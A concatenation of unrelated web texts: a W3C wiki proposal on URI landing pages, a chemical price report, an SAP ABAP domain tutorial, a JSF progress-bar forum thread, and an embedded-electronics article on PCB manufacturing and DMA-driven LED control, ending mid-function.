Description. libvault alternatives and similar packages Based on the "Third Party APIs" category. Alternatively, view libvault alternatives based on common mentions on social networks and blogs. stripity_stripe9.5 7.0 libvault VS stripity_stripeAn Elixir Library for Stripe slack9.3 0.3 libvault VS slackSlack real time messaging and web API client in Elixir google-cloud9.3 9.9 libvault VS google-cloudElixir client libraries for accessing Google APIs. tentacat9.1 1.2 libvault VS tentacatSimple Elixir wrapper for the GitHub API pigeon9.1 5.7 libvault VS pigeoniOS and Android push notifications for Elixir gringotts8.9 0.0 libvault VS gringottsA complete payment library for Elixir and Phoenix Framework extwitter8.9 4.9 libvault VS extwitterTwitter client library for elixir. ex_twilio8.8 4.3 libvault VS ex_twilioTwilio API client for Elixir nadia8.8 1.6 libvault VS nadiaTelegram Bot API Wrapper written in Elixir ethereumex8.4 4.1 libvault VS ethereumexElixir JSON-RPC client for the Ethereum blockchain mailgun8.3 0.0 libvault VS mailgunElixir Mailgun Client statix8.3 0.0 libvault VS statixFast and reliable Elixir client for StatsD-compatible servers - 7.8 0.0 libvault VS facebookFacebook Graph API Wrapper written in Elixir MongoosePush7.7 0.0 libvault VS MongoosePushMongoosePush is a simple Elixir RESTful service allowing to send push notification via FCM and/or APNS. commerce_billing7.7 0.0 libvault VS commerce_billingA payment processing library for Elixir ex_statsd7.4 0.0 libvault VS ex_statsdA statsd client implementation for Elixir. spotify_ex7.3 3.4 libvault VS spotify_exElixir wrapper for the Spotify Web API Execjs7.2 0.0 libvault VS ExecjsRun JavaScript code from Elixir shopify7.1 0.0 libvault VS shopifyEasily access the Shopify API with Elixir. kane7.0 0.0 libvault VS kaneGoogle Pub/Sub client for Elixir sendgrid7.0 0.1 libvault VS sendgridCreate and send composable emails with Elixir and SendGrid. 
lob_elixir6.9 3.0 libvault VS lob_elixirElixir Library for Lob API apns6.7 0.0 libvault VS apnsAPNS for Elixir mailchimp6.7 1.2 libvault VS mailchimpA basic Elixir wrapper for version 3 of the MailChimp API sparkpost6.7 0.0 libvault VS sparkpostSparkPost client library for Elixir diplomat6.6 0.0 libvault VS diplomatElixir library for interacting with Google's Cloud Datastore m2x6.6 0.0 libvault VS m2xAT&T M2X Elixir Library elixtagram6.5 0.0 libvault VS elixtagram:camera: Instagram API client for the Elixir language (elixir-lang) forcex6.5 0.0 libvault VS forcexElixir library for the Force.com / Salesforce / SFDC REST API Stripe6.4 0.0 libvault VS StripeStripe API client for Elixir airbrakex6.4 0.0 libvault VS airbrakexElixir client for the Airbrake service. qiniu6.3 0.0 libvault VS qiniuQiniu sdk for Elixir google_sheets6.1 0.0 libvault VS google_sheetsElixir library for fetching Google Spreadsheet data in CSV format dnsimple5.9 5.2 libvault VS dnsimpleThe DNSimple API client for Elixir. instrumental5.6 0.0 libvault VS instrumentalAn Elixir client for Instrumental amazon_product_advertising_clientAn Amazon Product Advertising API client for Elixir bitpay5.4 0.0 libvault VS bitpayElixir core library for connecting to bitpay.com ex_gecko5.4 7.8 libvault VS ex_geckoElixir SDK to communicate with Geckoboard's API. cashier5.4 0.0 libvault VS cashierCashier is an Elixir library that aims to be an easy to use payment gateway, whilst offering the fault tolerance and scalability benefits of being built on top of Erlang/OTP mandrill5.4 0.0 libvault VS mandrilla Mandrill wrapper for Elixir pay_pal5.3 0.0 libvault VS pay_pal:money_with_wings: PayPal REST API client for the Elixir language (elixir-lang) riemann5.2 0.0 libvault VS riemannA Riemann client for Elixir, surprise! keenex5.1 0.0 libvault VS keenexKeen.io API Client for Elixir Stripy5.0 0.1 libvault VS StripyMicro wrapper for Stripe's REST API. 
ExTrello4.9 0.0 libvault VS ExTrelloAn Elixir library for interfacing with the Trello API dogstatsd4.9 0.0 libvault VS dogstatsdAn Elixir client for DogStatsd airbrake4.8 1.0 libvault VS airbrakeAn Elixir notifier to the Airbrake/Errbit. System-wide error reporting enriched with the information from Plug and Phoenix channels. telegex4.8 1.7 libvault VS telegexTelegram bot library for Elixir pusher4.8 0.0 libvault VS pusherElixir library to access the Pusher REST API. elixir_ipfs_api4.6 0.0 libvault VS elixir_ipfs_apiThe Elixir library that is used to communicate with the IPFS REST endpoint. Do you think we are missing an alternative of libvault or a related project? README libvault. API Preview {:ok, vault } = Vault.new([ engine: Vault.Engine.KVV2, auth: Vault.Auth.UserPass ]) |> Vault.auth(%{username: "username", password: "password"}) {:ok, db_pass} = Vault.read(vault, "secret/path/to/password") {:ok, %{"version" => 1 }} = Vault.write(vault, "secret/path/to/creds", %{secret: "secrets!"}) Configuration / Adapters Hashicorp's Vault is highly configurable. Rather than cover every possible option, this library strives to be flexible and adaptable. Auth backends, Secret Engines, and HTTP clients are all replaceable, and each behaviour asks for a minimal contract. HTTP Adapters The following HTTP Adapters are provided: Be sure to add applications and dependencies to your mix file as needed. JSON Adapters Most JSON libraries provide the same methods, so no default adapter is needed. You can use Jason, JSX, Poison, or whatever encoder you want. Defaults to Jason or Poison if present. See Vault.JSON.Adapter for the full behaviour interface. 
Auth Adapters Adapters have been provided for the following auth backends: - AppRole with Vault.Auth.Approle - Azure with Vault.Auth.Azure - GitHub with Vault.Auth.Github - GoogleCloud with with Vault.Auth.GoogleCloud - JWT with Vault.Auth.JWT - Kubernetes with Vault.Auth.Kubernetes - LDAP with Vault.Auth.LDAP - UserPass with Vault.Auth.UserPass - Token with Vault.Auth.Token In addition to the above, a generic backend is also provided ( Vault.Auth.Generic). If support for auth provider is missing, you can still get up and running quickly, without writing a new adapter. Secret Engine Adapters Most of Vault's Secret Engines use a replacable API. The Vault.Engine.Generic adapter should handle most use cases for secret fetching. Vault's KV version 2 broke away from the standard REST convention. So KV has been given its own adapter: Additional request methods The core library only handles the basics around secret fetching. If you need to access additional API endpoints, this library also provides a Vault.request method. This should allow you to tap into the complete vault REST API, while still benefiting from token control, JSON parsing, and other HTTP client nicities. Installation and Usage Installation Ensure that any adapter dependencies have been included as part of your application's dependencies: def deps do [ {:libvault, "~> 0.2.0"}, # tesla, required for Vault.HTTP.Tesla {:tesla, "~> 1.3.0"}, # pick your HTTP client - Mint, iBrowse or hackney {:mint, "~> 0.4.0"}, {:castore, "~> 0.1.0"}, # Pick your json parser - Jason or Poison {:jason, ">= 1.0.0"} ] end Usage vault = Vault.new([ engine: Vault.Engine.KVV2, auth: Vault.Auth.UserPass, json: Jason, credentials: %{username: "username", password: "password"} ]) |> Vault.auth() {:ok, db_pass} = Vault.read(vault, "secret/path/to/password") {:ok, %{"version" => 1 }} = Vault.write(vault, "secret/path/to/creds", %{secret: "secrets!"}) You can configure the vault client up front, or change configuration on the fly. 
vault = Vault.new() |> Vault.set_auth(Vault.Auth.Approle) |> Vault.set_engine(Vault.Engine.Generic) |> Vault.auth(%{role_id: "role_id", secret_id: "secret_id"}) {:ok, db_pass} = Vault.read(vault, "secret/path/to/password") vault = Vault.set_engine(vault, Vault.Engine.KVV2) # switch to versioned secrets {:ok, db_pass} = Vault.write(vault, "kv/path/to/password", %{ password: "db_pass" }) See the full Vault client for additional methods. Testing Locally When possible, tests run against a local vault instance. Otherwise, tests run against the Vault Spec, using bypass to confirm the success case, and follow vault's patterns for failure. Install the Vault Go CLI In the current directory, set up a local dev server with sh scripts/setup-local-vault Vault (at this time) can't be run in the background without a docker instance. For now, set up the local secret engine paths with sh scripts/setup-engines.sh Documentation can be generated with ExDoc and published on HexDocs. Once published, the docs can be found at.
https://elixir.libhunt.com/libvault-alternatives
CC-MAIN-2021-43
refinedweb
1,350
61.12
Help Please- on design approach for data collection across n/w Sathvathsan Sampath Ranch Hand Joined: Oct 03, 2000 Posts: 96 posted May 10, 2001 02:50:00 0 hello ppl, Could you ppl please comment on my approach. I would be very grateful for comments/criticism/help etc. Task description: As part of billing data collection, I need to extract data from flat files across the network from different machines (both NT and Solaris). The flat file data on the different machines are in different formats and therefore I need to parse each of them individually to extract the data in a pre-defined format and collate them into a single file. This large flat file then eventually needs to be uploaded onto another machine. This task must be scheduled to run on a daily basis at a particular time. Please note that all the clients/machines are within the firewall - they are on the local n/w. Also, the pre-defined format is not expected to change for a fairly long duration. And, the number of clients is 3 and is not expected to increase beyond 5 over a long duration. My proposed approach: STEP 1: As a first task I gather the flat files in different formats distributed across the network to a temporary working folder on my server (Solaris). I could think of 2 possible solutions here: - (a) run platform-specific scripts on the individual machines containing the flat files that would ftp them to the Solaris box. On the NT box, I would use the Task Scheduler to do this. And on the other Unix boxes I would use a cron job to do the same. - (b) Alternatively, to access the clients' file systems, write a server process listening on a specific port and run a client process on every machine that would transfer these files by establishing a socket connection. This would mean I need to have or install JVMs on all the clients as I intend to write only in Java. I would once again write some scripts to schedule it to run on a daily basis. Basically, the question is a Java-based application using sockets instead of FTP.
- Or use RMI - maybe an overkill here. And besides, I am not familiar with it. I am inclined to choose option (a) coz it can be implemented quickly. Does anyone have a better idea than these & also please comment on the approach. Thanks in advance, ------------------ - Sathvathsan Sampath - Sathvathsan Sampath Cindy Glass "The Hood" Sheriff Joined: Sep 29, 2000 Posts: 8521 posted May 11, 2001 06:46:00 0 Why don't you use the URLConnection class to connect to the remote server and communicate with it directly inside your java program? import java.io.*; import java.net.*; public class FtpTest { public static void main(String[] args) throws Exception { FtpFile accounts = new FtpFile("ftp://user:password@hostname/filename"); } } class FtpFile { public FtpFile(String url) throws Exception { URL site = new URL(url); URLConnection siteCon = site.openConnection(); siteCon.setDoInput(true); siteCon.connect(); BufferedReader in = new BufferedReader(new InputStreamReader(siteCon.getInputStream())); String inputLine; while((inputLine = in.readLine()) != null){ System.out.println(inputLine); } in.close(); } } "JavaRanch, where the deer and the Certified play" - David O'Meara I agree. Here's the link:
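The per-source parsing and collation step described in the original post — normalizing differently formatted flat-file lines into one pre-defined record layout — can be sketched in Java; both input line formats here are invented for illustration:

```java
import java.util.ArrayList;
import java.util.List;

class Collate {
    // Source A lines look like "id|value"; source B lines like "value;id".
    // Both are normalized to a common "id,value" format. (Hypothetical formats.)
    static String fromSourceA(String line) {
        String[] f = line.split("\\|");
        return f[0] + "," + f[1];
    }

    static String fromSourceB(String line) {
        String[] f = line.split(";");
        return f[1] + "," + f[0];
    }

    // Collate all normalized records into one list, ready to write to a file.
    static List<String> collate(List<String> a, List<String> b) {
        List<String> out = new ArrayList<>();
        for (String line : a) out.add(fromSourceA(line));
        for (String line : b) out.add(fromSourceB(line));
        return out;
    }

    public static void main(String[] args) {
        List<String> merged = collate(List.of("42|3.50"), List.of("9.99;43"));
        System.out.println(merged);  // [42,3.50, 43,9.99]
    }
}
```

In practice each parser would read its own downloaded file, and the merged list would be written to the single upload file.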
http://www.coderanch.com/t/322340/java/java/design-approach-data-collection
CC-MAIN-2014-41
refinedweb
597
60.45
"Rogue 9" <rogue9 at ntlworld.com> wrote in message news:ydFpa.15$IO5.10324 at newsfep2-gui.server.ntli.net... > Hi all, > I'm new to both programming and Python in particular and have run in to a > snag while trying to write my own program.I have looked through books and > the web but haven't as yet found an answer so I though I might try a post > here to see if anyone could point me in the right direction. > Okay my program is for analysing a Lottery Draw results text file I have > pre-formatted so that each line contains 7 comma separated values (Draw > number and six values representing the numbers drawn in numerically > ascending order. > I've sussed out how to open the file read in the lines and I have split > the strings first by the '\n' newline symbol and then I have split it > again by ','.I've also turned the values back into integers as they were > strings.Now what I've ended up with is a list containing one draw result > for each week (768 at the last count)as individual items in that list e.g > list =[[767,11,22,33,44,45,46]......[1,20,33,41,45,46,47]] > What I really want is a list or dictionary for each individual weeks > result but I can't seem to work out how to dynamically create a list or > dict with a unique name for each week. You've already got a list for each week. Since I don't know where you're going with this (that is, I don't know what you mean by "analyze") I can't give you more specific answers. So I'm going to assume that what you want is to be able to find the results by week number. The following (untested) code should give you an idea. biglist.sort() # turn the list around so week 1 is at the front. aWeek = biglist[week-1][1:] # gives you a list of the six result numbers for the week. 
> The results file will grow and I > don't fancy creating 768+ lines of code just to instantiate a list or > dict.At first I tried looping a variable equal to the length of the file > as in: > x=len(filelength) > 'draw'+str(x)=[drawresult] > I thought this would dynamically make a whole bunch of lists such as > draw1,draw2 etc. but all I got was errors. Unfortunately, you can't do that. There is a way to add names to a namespace in Python, but it's not what you want. If you want to create a name for each list, you need a dict. The following (untested) code will build a dict with a name for each week of the lottery, and with the six numbers as a list. weekDict = {} # create a dictionary for weeksNumbers in biglist: # biglist is the list you built on your input weekDict["draw" + str(weeksNumbers[0])] = weeksNumbers[1:] # notice the way it slices the week! The keys in weekDict will now be "draw1", "draw2" and so forth, assuming your input list is the one you mentioned before. > I hope I have explained my 'problem' sufficiently for someone to help or > to at least point me in the right direction to work towards a solution. > Yours hopefully, > Rogue9 HTH John Roth
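Putting John's two suggestions together in one runnable sketch (the draw numbers below are made up):

```python
# Each inner list is [draw_number, n1..n6], as built from the CSV file.
biglist = [[3, 5, 12, 19, 23, 31, 44],
           [1, 20, 33, 41, 45, 46, 47],
           [2, 7, 11, 18, 29, 36, 40]]

# Suggestion 1: sort so draw 1 is first, then index by week number.
biglist.sort()
week = 2
a_week = biglist[week - 1][1:]   # six numbers for draw 2

# Suggestion 2: a dict keyed by "drawN", one entry per draw.
week_dict = {}
for nums in biglist:
    week_dict["draw" + str(nums[0])] = nums[1:]

print(a_week)               # [7, 11, 18, 29, 36, 40]
print(week_dict["draw1"])   # [20, 33, 41, 45, 46, 47]
```

Either way, no 768 hand-written names are needed: new draws appended to the file just become new list entries or dict keys.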
https://mail.python.org/pipermail/python-list/2003-April/197071.html
CC-MAIN-2016-40
refinedweb
564
78.48
On 06-Nov-02, 15:54 (CST), Eric Richardson <eric.richardson@milagrosoft.com> wrote: > /etc/modules * > /etc/modules.conf * > > * required and necessary as part of the operating kernel but no versions > to separate differences between versions of kernels since modules are an > essential part of the kernel. But in general, you don't *need* version-specific modules{.conf}. I've had the same modules.conf stuff for years. As I change hardware, I change the configuration. I typically add stuff, not remove it, as having "extras" doesn't cause a problem. And if I *do* need a version-specific option, I simply use the tools that the modules.conf 'language' already provides. > Proposal to support different module files loaded for different kernel > versions. I guess I don't see what this buys you that isn't already provided by the if-then-elseif-else-endif construct and the include command. In fact, it seems like a step backwards, because I now have to maintain separate files for each version, rather than being able to group things the way they are actually used. As for /etc/modules, again, I don't see that it is particularly version dependent. If you have some kernel versions with more modules than others, *and* they must be loaded at boot time (rather than 'on-demand' through modules.conf), then simply add them to /etc/modules. If they exist, they get loaded. If not, they don't. What's the problem? (As a side note, I guess I've always figured that if it's vital enough to be in /etc/modules, why is it modularized in the first place? Yes, for distribution kernels, sure, but once you start building your own, then why bother?) > That's about it. Hopefully this gives a clearer picture of what I'm > talking about. Apparently not, as I still don't see what problem you have that isn't solved by the existing tools. Steve -- Steve Greenland The irony is that Bill Gates claims to be making a stable operating system and Linus Torvalds claims to be trying to take over the world.
-- seen on the net
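For reference, the modules.conf conditional Steve points to looks roughly like this (an illustrative fragment — the aliases and driver names are made up):

```
# /etc/modules.conf: one file covering several kernel versions
if `kernelversion` == 2.4
    alias eth0 tulip
elseif `kernelversion` == 2.2
    alias eth0 old_tulip
else
    alias eth0 de4x5
endif

include /etc/modutils/local
```

One file like this serves every installed kernel, which is the grouping-by-use Steve describes.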
https://lists.debian.org/debian-devel/2002/11/msg00396.html
CC-MAIN-2015-40
refinedweb
359
67.35
Using Memcache Memcache is one of the App Engine services. It is a volatile-memory key-value store. It operates over all your JVM instances; as long as an item remains in Memcache, it can be accessed by any of your application’s processes. Memcache contents remain indefinitely if you don’t set them to expire, but can be removed (“evicted”) by App Engine at any time. So, never count on a Memcache entry to exist in order for your application to work correctly. The service is meant only as a cache that allows you quicker access to information that you would otherwise obtain from the Datastore or have to generate. Memcache is often used both for storing copies of data objects and for storing relatively static display information, allowing web pages to be built more quickly. Transactions over Memcache operations are not supported—any Memcache changes you make within a transaction are not undone if the transaction is rolled back. The basic Memcache operations are put, get, and delete: put stores an object in the cache indexed by a key; get accesses an object based on its cache key; and delete removes the object stored at a given cache key. A Memcache put is atomic—the entire object will be stored properly or not at all. Memcache also has the ability to perform increments and decrements of cache values as atomic operations. Objects must be serializable in order to be stored in Memcache. At the time of writing, Memcache has a 1MB size limit on a given cached value, and data transfer to/from Memcache counts towards an app quota (we further discuss quotas in Chapter 11). Memcache has two features that can be particularly useful in organizing your cached data—the ability to define cache namespaces and the ability to define when a cache entry expires. We’ll use these features in Connectr. App Engine supports two different ways to access Memcache—via an implementation of the JCache API or via an App Engine Java API.
JCache is a (not-yet-official) proposed interface standard, JSR 107. The Connectr app will use the App Engine's Memcache API, which exposes a bit more of its functionality. This page and its related links have more information on uses for Memcache: scaling/memcache.html. For more information on JCache, see detail?id=107 and docs/java/memcache/usingjcache.html. Using the App Engine Memcache Java API in Connectr To access the Memcache service in Connectr, we will use the com.google.appengine.api.memcache package (java/javadoc/com/google/appengine/api/memcache/package-summary.html). To facilitate this, we'll build a "wrapper" class, server.utils.cache.CacheSupport, which does some management of Memcache namespaces, expiration times, and exception handling. The code for the server.utils.cache.CacheSupport class is as follows: import java.io.Serializable; import com.google.appengine.api.memcache.Expiration; import com.google.appengine.api.memcache.MemcacheService; import com.google.appengine.api.memcache.MemcacheServiceException; import com.google.appengine.api.memcache.MemcacheServiceFactory; public class CacheSupport { private static MemcacheService cacheInit(String nameSpace){ MemcacheService memcache = MemcacheServiceFactory.getMemcacheService(nameSpace); return memcache; } public static Object cacheGet(String nameSpace, Object id){ Object r = null; MemcacheService memcache = cacheInit(nameSpace); try { r = memcache.get(id); } catch (MemcacheServiceException e) { // nothing can be done. } return r; } public static void cacheDelete(String nameSpace, Object id){ MemcacheService memcache = cacheInit(nameSpace); memcache.delete(id); } public static void cachePutExp(String nameSpace, Object id, Serializable o, int exp) { MemcacheService memcache = cacheInit(nameSpace); try { if (exp>0) { memcache.put(id, o, Expiration.byDeltaSeconds(exp)); } else { memcache.put(id, o); } } catch (MemcacheServiceException e) { // nothing can be done.
} } public static void cachePut(String nameSpace, Object id, Serializable o){ cachePutExp(nameSpace, id, o, 0); } } As seen in the cacheInit method, to use the cache, first obtain a handle to the Memcache service via the MemcacheServiceFactory, optionally setting the namespace to be used: MemcacheService memcache = MemcacheServiceFactory.getMemcacheService(nameSpace); Memcache namespaces allow you to partition the cache. If the namespace is not specified, or if it is reset to null, a default namespace is used. Namespaces can be useful for organizing your cached objects. For example (to peek ahead to the next section), when storing copies of JDO data objects, we'll use the classname as the namespace. In this way, we can always use an object's app-assigned String ID or system-assigned Long ID as the key without concern for key clashes. You can reset the namespace accessed by the Memcache handle at any time by calling: memcache.setNamespace(nameSpace); Once set for a Memcache handle, the given namespace is used for the Memcache API calls. Therefore, any subsequent gets, puts, or deletes via that handle will access that namespace. As this book goes to press, a new Namespace API is now part of App Engine. The Namespace API supports multitenancy, allowing one app to serve multiple "tenants" or client organizations via the use of multiple namespaces to separate tenant data. A number of App Engine service APIs, including the Datastore and Memcache, are now namespace-aware, and a namespace may be set using a new Namespace Manager. The getMemcacheService() method used in this chapter, if set with a namespace, will override the more general settings of the Namespace Manager. So, for the most part, you do not want to use these two techniques together—that is, if you use the new Namespace API to implement multitenancy, do not additionally explicitly set Memcache namespaces as described in this chapter.
Instead, leave it to the Namespace Manager to determine the broader namespace that you are using, and ensure that your cache keys are unique in a given "tenant" context. docs/java/multitenancy/overview.html provides more information about multitenancy. To store an object in Memcache, call: memcache.put(key, value); where memcache is the handle to the Memcache service, and both the key and the value may be objects of any type. The value object must be serializable. The put method may take a third argument, which specifies when the cache entry expires. See the documentation for more information on the different ways in which expiration values can be specified. To retrieve an object with a given key from Memcache, call: Object r = memcache.get(key); where again memcache is the handle to the Memcache service. If the object is not found, get will return null. To delete an object with a given key from Memcache, call: memcache.delete(key); If these operations encounter a Memcache service error, they may throw a MemcacheServiceException. It is usually a good idea to just catch any Memcache-generated errors. Thus, the cacheGet, cacheDelete, and cachePut/cachePutExp methods of CacheSupport create a namespace-specific handler based on their namespace argument, perform the specified operation in the context of that namespace, and catch any MemcacheServiceExceptions thrown. The cachePutExp method takes an expiration time, in seconds, and sets the cached object to expire accordingly. CacheSupport requires the cache value argument to implement Serializable (if the wrapper class had not imposed that requirement, a put error would be thrown if the value were not Serializable). Memcache error handlers The default error handler for the Memcache service is the LogAndContinueErrorHandler, which just logs service errors instead of throwing them. The result is that service errors act like cache misses.
So if you use the default error handler, MemcacheServiceException will in fact not be thrown. However, it is possible to set your own error handler, or to use the StrictErrorHandler, which will throw a MemcacheServiceException for any service error. See the com.google.appengine.api.memcache documentation (.com/appengine/docs/java/javadoc/com/google/appengine/api/memcache/package-summary.html) for more information. Memcache statistics It is possible to access statistics on Memcache use. Using the com.google.appengine.api.memcache API, you can get information about things such as the number of cache hits and misses, the number and size of the items currently in the cache, the age of the least-recently accessed cache item, and the total size of data returned from the cache. The statistics are gathered over the service's current uptime (and you cannot explicitly reset them), but they can be useful for local analysis and relative comparisons. Atomic increment/decrement of Memcache values Using the com.google.appengine.api.memcache API, it is possible to perform atomic increments and decrements on cache values. That is, the read of the value, its modification, and the storage of the new value can be performed atomically, so that no other process may update the value between the time it is read and the time it is updated. Because Memcache operations cannot be a part of regular transactions, this can be a useful feature. For example, it can allow the implementation of short-term volatile-memory locks. Just remember that the items in the cache can be evicted by the system at any time, so you should not depend upon any Memcache content for the correct operation of your app. The atomic increments and decrements are performed using the variants of the increment() and incrementAll() methods of MemcacheService. You specify the delta by which to increment and can perform a decrement by passing a negative delta.
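The atomic read-modify-write that increment() provides can be illustrated with a JVM-local stand-in; here ConcurrentHashMap.merge plays the role of MemcacheService.increment (this is a sketch of the semantics, not the Memcache API itself):

```java
import java.util.concurrent.ConcurrentHashMap;

class AtomicCounterSketch {
    private final ConcurrentHashMap<String, Long> cache = new ConcurrentHashMap<>();

    // Stand-in for MemcacheService.increment(key, delta):
    // the read, the addition, and the store happen as one atomic step.
    long increment(String key, long delta) {
        return cache.merge(key, delta, Long::sum);
    }

    public static void main(String[] args) {
        AtomicCounterSketch c = new AtomicCounterSketch();
        c.increment("hits", 1);
        c.increment("hits", 1);
        long n = c.increment("hits", -1);  // a negative delta decrements
        System.out.println(n);  // 1
    }
}
```

With a plain get-then-put, two concurrent processes could both read the same old value; the merged single step is what rules that out.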
See the com.google.appengine.api.memcache documentation for more information. Using Memcache with JDO data objects One common use of the Memcache service is to cache copies of persistent data objects in volatile memory so that you don’t always have to make a more time-consuming Datastore fetch to access them: you can check the cache for the object first, and only if you have a cache miss do you need to access the Datastore. Objects must be serializable in order to be stored in Memcache, so any such cached data classes must implement Serializable. When storing a JDO object in Memcache, you are essentially storing a detached copy, so be sure to prefetch any lazily loaded fields that you want to include in the cached object before storing it. When using Memcache to cache data objects, be aware that there is no way to guarantee that related Memcache and Datastore operations always happen together—you can’t perform the Memcache operations under transactional control, and a Memcache access might transiently fail (this is not common, but is possible), leaving you with stale cached data. Thus, it is not impossible for a Memcache object to get out of sync with its Datastore counterpart. Typically, the speedup benefits of using Memcache far outweigh such disadvantages. However, you may want to give all of your cached objects an expiration date. This helps the cache “re-sync” after a period of time if there are any inconsistencies. The pattern of cache usage for data objects is typically as follows, depending upon whether or not an object is being accessed in a transaction. - Within a transaction When accessing an object from within a transaction, you should not use the cached version of that object, nor update the cache inside the transaction. This is because Memcache is not under transactional control. If you were to update the cache within a transactional block, and then the transaction failed to commit, the Memcache data would be inconsistent with the Datastore.
So when you access objects inside a transaction, purge the cache of these objects. Post-transaction, you can cache a detached copy of such an object, once you have determined that the commit was successful.

- Outside a transaction

If a Datastore access is not under transactional control, this means that it is not problematic to have multiple processes accessing that object at the same time. In that case, you can use Memcache as follows:

When reading an object: first check to see if the object is in the cache; if not, then fetch it from the Datastore and add it to the cache.

When creating or modifying an object: save it to the Datastore first, then update the cache if the Datastore operation was successful.

When deleting an object: delete from the cache first, then delete from the Datastore.

In all cases, be sure to catch any errors thrown by the Memcache service so that they do not prevent you from doing your other work. When using Memcache to store data objects, it can be useful to employ some form of caching framework, so that you do not have to add object cache management code for every individual method and access. In the next section, we will look at one way to do this: using capabilities provided by JDO.
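The three non-transactional rules above can be sketched with plain maps standing in for Memcache and the Datastore. The class and method names here are hypothetical, not App Engine APIs; the point is only the ordering of the cache and Datastore operations.

```java
import java.io.Serializable;
import java.util.HashMap;
import java.util.Map;

public class CachedRepo {
    // Hypothetical stand-ins for Memcache and the Datastore.
    public final Map<String, Serializable> cache = new HashMap<>();
    public final Map<String, Serializable> datastore = new HashMap<>();

    // Read: check the cache first; on a miss, fetch from the Datastore
    // and populate the cache for next time.
    public Serializable read(String key) {
        Serializable v = cache.get(key);
        if (v != null) return v;
        v = datastore.get(key);
        if (v != null) cache.put(key, v); // in real code, swallow cache errors
        return v;
    }

    // Create/modify: Datastore first, then cache only after the save succeeded.
    public void write(String key, Serializable value) {
        datastore.put(key, value);
        cache.put(key, value);
    }

    // Delete: cache first, then Datastore (the order given in the text).
    public void delete(String key) {
        cache.remove(key);
        datastore.remove(key);
    }
}
```

A read after a simulated eviction repopulates the cache from the Datastore, which is exactly the "check cache, fall back, refill" behavior described above.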
http://www.javabeat.net/google-app-engine-java-and-gwt-application-development/3/
This quickstart shows you how to use Cloud Debugger to debug the state of a simple Python app running on App Engine. This quickstart shows you how to accomplish the following:

- Inspect local variables and the call stack
- Generate logging statements
- Set snapshot conditions and use expressions

In the Google Cloud Console, on the project selector page, select or create a Google Cloud project. Make sure that billing is enabled for your Cloud project. Learn how to confirm that billing is enabled for your project.

- Install and initialize the Cloud SDK.
- Make sure that the following software is installed on your local system:

Deploy sample app to App Engine

Start by deploying a Python 3.7 app to App Engine.

Clone the app to your local computer:

    git clone

Navigate to the directory that contains the app:

    cd python-docs-samples/appengine/standard_python3/cloud_debugger

Deploy the app to App Engine by issuing the following command:

    gcloud app deploy

When prompted, select the region where you want your App Engine app located.

View the app by issuing the following command:

    gcloud app browse

If a browser window does not automatically open displaying the app, click the URL that appears in the terminal. The app contains a prompt to enter a string, with the field already prepopulated. Click Submit.

You see two results after clicking Submit. One is labeled Program Output and shows the output from the Reverse method in the source code. The other is labeled Correct Output and is the output from Python's reverse list functionality. The Program Output and the Correct Output should be identical. However, there's a problem with the source code. Use Debugger to diagnose the issue.

View deployed source code

After you have deployed your app, you can view the deployed source code on the Google Cloud Console Debug page.
Navigate to the Debug page in the Google Cloud Console. Make sure you have the correct project selected. Confirm Debugger has access to the deployed files by verifying that Deployed files is selected and the app's files are present. Make sure the correct version of your app is selected: App Engine maintains all the deployed versions of an app, so when using Debugger, verify that you have the correct version of the app selected.

After selecting the main.py file, you see the following block of code:

    try:
        import googleclouddebugger
        googleclouddebugger.enable()
    except ImportError:
        pass

    import logging
    logging.basicConfig(level=logging.INFO)

This section imports and enables the Debugger agent using a try and except block:

    try:
        import googleclouddebugger
        googleclouddebugger.enable()
    except ImportError:
        pass

This section configures logging:

    import logging
    logging.basicConfig(level=logging.INFO)

You are now ready to take debug snapshots and inject debug logpoints to diagnose the problem in the source code.

Take a debug snapshot

A debug snapshot captures the local variables and call stack that are in scope at a line location. To take a debug snapshot, click the line number that contains the tmp variable. A blue arrow appears, indicating that a snapshot is set, and the results panel displays "Waiting for snapshot to hit." To trigger your snapshot, refresh the page.

The Variables pane shows the values of the variables. See that the chars array was correctly populated on the first pass through the loop. The problem is not present here because the snapshot was taken the first time the breakpoint was hit. The Call Stack pane shows the results of the call stack. You can click the functions in the Call Stack pane to see the local variables and parameters at that point in the code. When you click ReverseString, you see that the input was correct. Since taking a snapshot and inspecting the variables and call stack didn't reveal the problem, use logpoints to track down the problem.
Inject a debug logpoint

A debug logpoint enables you to inject logging into your running app without restarting it. To insert a logpoint, select the Logpoint tab. Click the line number that contains the tmp variable. An inline text box appears. Populate the fields as follows and click Add:

    if (True) logpoint("About to swap two characters. Chars is currently {chars}")

A logpoint has the following structure: if(condition)logpoint(string). To create a logpoint, you supply two parts:

- A condition, which must be written in the syntax of the source code.
- A string, which can contain any number of expressions in curly braces written in the syntax of the source code.

To verify that the logpoint has been injected successfully, select the Logpoint History tab. To trigger the logpoint, refresh the page. To see the logs generated by the logpoint, select the Logs panel and click refresh.

Diagnosing the issue

The logpoints indicate that the while loop executes three times, but it only needs to execute two times. Since the logpoint is set at the beginning of the loop, it logged that it was about to swap characters on a string that was already fully reversed. To pinpoint the problem, use a debug snapshot with a condition.

Take a debug snapshot using a condition

The app uses the left variable and the right variable to track when to stop swapping values. When the left variable is greater than the right variable, the loop should terminate. Snapshots can be set to trigger based on a condition in the source code. Since you know when the loop should terminate, use a snapshot with a condition to isolate the problem.

To determine why the loop executes too many times, set the snapshot to trigger on the following condition: left > right. Then click the camera icon to prepare Debugger for the snapshot. Trigger the snapshot by refreshing the page. The Variables pane shows that the left variable is greater than the right variable.
Since the left variable is already greater than the right variable at this point in the loop, it means that as the loop continues, it will swap the values one more time before it reaches line 50 and exits the loop.

Take a debug snapshot using an expression

Debugger also lets you retrieve programming-language expressions when the snapshot is triggered. For example, you can retrieve the values in the chars array with expressions like chars[1] and chars[2]. To get the value of an expression when a snapshot is triggered, write the expression in the Expression field. You can enter multiple expressions. After the snapshot triggers, the expression values appear above the Variables pane.

Fixing the issue

Snapshots and logpoints help diagnose the problem in the app. In this example, the while loop executes too many times because the statement that stops the loop, if left >= right: break, is reached too late to stop the last iteration. To fix the problem, move if left >= right: break from line 50 to line 47.

Clean up

To avoid incurring charges to your Google Cloud account for the resources used on this page, follow these steps.

What's next

- Learn more about setting up the Debugger
- Learn more about using the Debugger
- Read our resources about DevOps and explore our research program.
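Putting the fix together: the sample app's full source is not reproduced here, but the loop's shape can be sketched as a two-pointer reversal (the function name and details are this sketch's, not necessarily the sample's). The point is that the termination test must run before the swap, not after it.

```python
def reverse_string(s):
    """Two-pointer, in-place reversal sketch."""
    chars = list(s)
    left, right = 0, len(chars) - 1
    while True:
        # The fix: test *before* swapping. With the test after the swap,
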